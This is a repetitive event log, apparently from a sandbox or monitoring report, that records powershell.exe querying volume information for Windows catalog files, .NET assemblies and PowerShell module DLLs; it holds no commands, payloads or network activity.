Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
